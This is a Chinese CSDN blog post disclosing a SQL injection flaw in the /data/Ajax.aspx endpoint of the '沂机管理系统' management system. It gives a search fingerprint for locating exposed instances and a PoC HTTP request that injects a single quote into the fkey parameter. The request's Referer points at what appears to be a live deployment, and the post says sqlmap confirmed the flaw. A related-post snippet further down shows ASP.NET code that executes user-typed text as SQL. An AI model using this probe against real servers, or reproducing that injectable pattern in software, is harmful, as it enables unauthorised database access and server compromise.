沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞

已于 2024-10-01 20:29:11 修改
阅读量58 收藏
点赞数 1
文章标签: ajax sql 前端
于 2024-10-01 20:12:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142674136
版权

漏洞描述

沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞,攻击者可以获取服务器权限

漏洞复现

body="后台管理系统演示版"

POC

GET /data/Ajax.aspx?method=log_list&page=1&limit=20&fkey=1'&fdate1=2024-10-01+00%3A00%3A00&fdate2=2024-10-01+23%3A59%3A59 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://221.2.93.215:8091/basedata/log_list.aspx?ModuleID=104&navtabid=a102&reporttitle=60xZrkSLVc4i9GTkoGayYA==&fwidth=600&fheight=355
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=d2dkwvksddxsvejtgqmh3oe3; pfbs_Login_compid=1001
Connection: keep-alive

bp 报错泄露绝对路径

sqlmap确认有漏洞

马船长
关注
ajaxdata,ajax请求的data数据格式
weixin_34357232的博客
08-05 8452
ajax提交data类型一、问题来源今天使用ajax时,发现get传data时,传递json字符串时传不过去参数,所以做了一些实验测试ajax的get和post的传递data时的不同。二、概念ajax有三种传递传递data的方式:json格式json字符串格式标准参数模式1.json格式形如:{“username”:”chen”,”nickname”:”alien”}ajax:$.ajax({ty...
人力资源管理系统AJAX+SQLSEVER+存储过程+三层架构开发)
12-18
1:全站采用AJAX+SQLSEVER+存储过程+三层架构开发,大大提高了访问的速度与安全。 2:该系统分为 系统管理员和普通员工两个权限,不同的员工登陆具有不同的页面,管理员可以自定义用户权限,默认管理员帐户:...
沂机管理系统存在存储型XSS漏洞
最新发布
2301_77012231的博客
10-01 32
沂机管理系统存在存储型XSS漏洞,窃取用户Cookie获取用户信息。
用友php漏洞,用友漏洞存在目录整理 | CN-SEC 中文网
weixin_34637293的博客
04-10 1327
/core/public/singleplandetail.jsp /epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_...
ajax请求和返回数据,ajax请求和aspx返回数据
weixin_30941189的博客
08-05 677
ajax请求:$(function () {$.ajax({url: "index.aspx?method=send",success: function (data) {JSON.parse(data).forEach(function (item) {console.log(item);})},error:function(xhr,status){console.log(status);}})...
ajax调用ashx的方法,jquery.ajax请求aspx和ashx的异同 Jquery Ajax调用aspx页面方法
weixin_36379666的博客
08-05 1020
1.jquery.ajax请求aspx请求aspx的静态方法要注意一下问题:(1)aspx的后台方法必须静态,而且添加webmethod特性(2)在ajax方法中contentType必须是“application/json”,(3)data传递的数据必须是严格的json数据,如"{'a':'aa','b':'bb'}",而且参数必须和静态方法的参数一 一对应(4)aspx的后台方法返回的数据默认...
五月份0day/1day/nday漏洞汇总
qq_39894062的博客
06-01 1040
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
最新漏洞POC_exp集合站 IT设备默认用户名密码 证语网络安全Lab
weixin_42744595的博客
08-09 5825
Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传。Emobile很难做后续利用,不过如果存在信息泄露风险的可以关注下8泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞,office9洞太多用的少没必要写了。10.亿赛通电子文档平台文件上传漏洞市面上的上传1day其实去年补丁都打完了,今年有新的,可以注意下。
asp.net jquery ajax 调用远程接口 实例,从客户端调用服务器方法在ASP.NET中使用jQuery AJAX...
weixin_32126511的博客
08-05 213
我必须使用ajax调用来调用服务器端方法更新(输入参数)。当我运行代码时,我的ajax没有加载。我想将该数据更新到Jquery Data table.please给我建议$(文件).on('点击','#btnsave',function(){//have to get the emp_idvar id = $('#hdnid').val();update(id);}...
Ajax+asp.net实现用户登陆 转自http://www.shangxueba.com/jingyan/2933319.html
weixin_30872671的博客
05-12 67
这篇文章主要介绍了Ajax+asp.net实现用户登陆,主要是为了练习ajax的使用方法,有需要的小伙伴参考下。 以用户登录为例练习ajax的使用方法 login.html <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta. ...
ASP+SQL学生排课管理系统(源代码+论文).zip
03-07
ASP.NET与SQL Server结合开发的学生排课管理系统是一个典型的Web应用程序,它主要利用ASP.NET作为前端交互平台,SQL Server作为后台数据库存储数据。该系统能够帮助学校有效地管理学生的课程安排,提高教学管理效率...
Jquery+ajax请求data显示在GridView上(asp.net)
12-12
它检查请求中是否存在`id`参数,如果存在,就构造SQL查询语句,根据接收到的`id`值筛选`Customers`表中的数据。然后,使用SqlCommand对象执行SQL命令,填充一个DataSet,再将这个DataSet绑定到GridView控件(gvData...
Ajax之用户注册实例_aspx开发教程.rar
09-09
ASP.NET Web Forms中,Ajax技术的运用极大地提升了用户体验,因为它允许页面的部分内容异步更新,而无需整个页面刷新。本教程将聚焦于一个具体的实例——利用Ajax实现用户注册功能。我们将探讨如何创建一个Aspx...
VUE 开发——AJAX学习(一)
weixin_74113429的博客
09-25 966
异步的javascript和XML,就是使用XMLHttp Request对象与服务器通信,浏览器和服务器进行数据交换的技术。语法:http://xxxx.com/xxx/xxx?1.请求报文:浏览器按照HTTP协议要求的格式,发送给服务器的内容,可以在网络中查看。3.URL查询参数:浏览器提供给服务器的额外信息,让服务器返回浏览器想要的数据。接口:使用AJAX和服务器通讯时,使用的URL,请求方法,以及参数。1.定义:统一资源定位符,简称网址,用于访问网络上的资源。URL:协议://域名/资源路径。
Spark 中所有用到了Job对象的组件模块和关系
goTsHgo的博客
09-27 838
负责整个Job的生命周期管理,包括阶段划分、任务调度、任务失败重试等。StageJob被分解为多个Stage,每个Stage对应于一组可并行执行的Task。Task和TaskSetStage被分解为多个Task,并通过TaskSet提交执行。和负责将任务调度到集群中具体的节点,负责与集群管理器交互,启动执行器并分配任务。ActiveJob:代表正在运行的Job,并与一起跟踪其状态。:负责Shuffle操作中,数据的输出位置跟踪与管理。Job。
AJAX(简介以及一些用法)
m0_63233901的博客
09-24 803
对象和服务器进行数据交互的方式就是。,它可以帮助我们轻松实现网页与服。)我们可以理解为:在网页中。务器之间的数据交互。
详解Ajax与axios的区别
weixin_56187723的博客
09-22 1152
Ajax与Axios在Web开发中都是用于发送HTTP请求的技术,但它们在多个方面存在显著的差异。
VUE 开发——AJAX学习(二)
weixin_74113429的博客
09-26 433
异步代码:调用后耗时,不阻塞代码继续执行(不必原地等待),在将来完成后触发一个回调函数;Promise:用于表示一个异步操作的最终完成(或失败)及其结果值。Promise对象一旦被兑现/拒绝,就是已敲定,状态无法再被改变。待定(pending):初始状态,既没有被兑现,也没有被拒绝。同步代码:逐行执行,需原地等待结果后,才继续向下执行。成功调用:resolve(值)触发then()执行。失败调用:reject(值)触发catch()执行。功能:不离开当前页面,显示单独内容,供用户操作。
ajax连接SQLServer
04-30
在使用Ajax连接SQL Server之前,需要确保您已经安装了Microsoft SQL Server,并且已经创建了您需要访问的数据库。接下来您可以按照以下步骤操作: 1. 首先,创建一个ASP.NET Web应用程序,并在其中添加一个WebForm页面。 2. 在WebForm页面中添加一个文本框和一个按钮。文本框用于输入查询语句,按钮用于触发查询操作。 3. 接下来,在WebForm页面中添加一个ScriptManager控件,以启用Ajax功能。 4. 在代码文件中添加以下命名空间: using System.Data.SqlClient; using System.Web.Script.Serialization; 5. 在按钮的单击事件中,编写C#代码来连接到SQL Server,并执行查询。以下是一个简单的示例代码: protected void Button1_Click(object sender, EventArgs e) { string connStr = "Data Source=myServerAddress;Initial Catalog=myDataBase;User Id=myUsername;Password=myPassword;"; SqlConnection conn = new SqlConnection(connStr); SqlCommand cmd = new SqlCommand(); cmd.Connection = conn; cmd.CommandText = TextBox1.Text; conn.Open(); SqlDataReader reader = cmd.ExecuteReader(); DataTable dt = new DataTable(); dt.Load(reader); conn.Close(); JavaScriptSerializer serializer = new JavaScriptSerializer(); string json = serializer.Serialize(dt); Response.Write(json); } 在上面的代码中,您需要将“myServerAddress”替换为SQL Server实例的名称,“myDataBase”替换为要连接的数据库的名称,“myUsername”和“myPassword”替换为访问数据库的凭据。 6. 最后,在WebForm页面中添加一个JavaScript函数,使用Ajax从服务器获取JSON数据并将其显示在页面上。以下是一个简单的示例代码: function getData() { var query = document.getElementById("TextBox1").value; var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { var data = JSON.parse(this.responseText); var table = "<table>"; for (var i = 0; i < data.length; i++) { table += "<tr>"; for (var j in data[i]) { table += "<td>" + data[i][j] + "</td>"; } table += "</tr>"; } table += "</table>"; document.getElementById("result").innerHTML = table; } }; xmlhttp.open("GET", "Default.aspx?query=" + encodeURIComponent(query), true); xmlhttp.send(); } 在上面的代码中,“result”是一个DIV元素,用于显示查询结果。此外,我们将查询字符串作为GET参数传递给服务器端。 以上就是使用Ajax连接SQL Server的简单示例。如果您需要更复杂的功能,请参考相关文档或教程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值